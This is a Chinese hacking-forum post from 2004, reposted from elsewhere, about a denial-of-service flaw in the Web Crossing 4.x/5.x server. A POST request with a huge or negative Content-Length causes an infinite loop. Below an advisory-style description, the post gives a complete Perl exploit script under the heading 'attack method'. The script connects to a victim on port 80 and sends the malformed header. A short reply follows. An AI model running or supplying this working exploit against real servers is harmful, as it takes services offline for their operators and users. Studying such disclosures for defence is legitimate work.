论坛: 黑客进阶 标题: WebCrossing4.x/5.x拒绝服务漏洞(转载) 复制本贴地址    
作者: ziaichen [ziaichen]    论坛用户   登录
涉及程序:
Web Crossing 4.x/5.x

描述:
Web Crossing 4.x/5.x 拒绝服务漏洞

详细:

web crossing 是世界上的主流服务器合作平台,提供包括讨论小组/ 布告牌的解决办案,综合的新闻组和邮寄名单,详尽的电子邮件服务,日历服务,实时聊天, 现场实况和整个web应用编程特征。

Web Crossing 4.x/5.x对用户请求缺乏过滤,当web-crossing的内嵌式服务器应用程序接到一个HTTP POST的请求的指令时,如果“Content-Length”为这个请求提供一个很大的数或者是负数时,服务器将接到一系列的指令导致无限循环问题,导致服务器因拒绝服务而崩溃。

这种恶意指令可以在at 0090121F中找到:0090121F F7F9 IDIV ECX



攻击方法:

#!/usr/bin/perl -w
#
# Web Crossing 4.x\5.x Denial of Service Exploit
# [ Bad 'Content-Length' Header Bug ]
#
# - by Peter Winter-Smith [peter4020_at_hotmail.com]
use IO::Socket;
if(!($ARGV[0]))
{
print "Usage: wxdos.pl <victim>\n";
exit;
}
print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
"\t[ Bad 'Content-Length' Header Bug ]\n" .
"\t[peter4020\@hotmail.com]\n\n";
$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on " .
"port 80";
$DoS = "POST / HTTP/1.1\r\n" .
"Content-Length: -1\r\n\r\n";
print $victim $DoS;
print "[+] Evil request made to target server ... Waiting...!\n";
sleep(4);
close($victim);
print "[+] Done!\n";
exit;



地主 发表时间: 04-02-18 11:32

回复: bridex [bridex]   论坛用户   登录
...****...Smith 好像很出名.


B1层 发表时间: 04-02-19 00:29

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号